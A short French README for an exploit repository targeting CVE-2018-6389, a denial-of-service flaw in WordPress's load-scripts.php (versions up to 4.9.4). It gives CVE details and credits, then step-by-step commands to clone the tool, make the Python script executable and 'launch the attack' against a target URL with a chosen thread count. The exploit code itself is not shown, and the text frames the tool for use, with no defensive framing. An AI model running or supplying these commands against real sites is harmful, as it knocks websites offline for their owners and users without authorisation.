
CVE-2018-6389 WordPress Core - 'load-scripts.php' Déni de service <= 4.9.4
Date : 05/02/2018
Lien du logiciel : WordPress
Version : <= 4.9.4
Testé sur : KaLi Linux 2018.1
CVE : CVE-2018-6389
Découvert par : Barak Tawily
Exploit par : Javier Olmedo
Clonez ce dépôt
git clone https://github.com/JJavierOlmedo/wordpress-cve-2018-6389.git
Accédez au dépôt local
cd wordpress-cve-2018-6389
Modifiez les permissions d'accès
sudo chmod +x wordpress-cve-2018-6389.py
Lancez l'attaque !!
python3 wordpress-cve-2018-6389.py -u <TARGET> -t <THREADS>
cve-2018-6389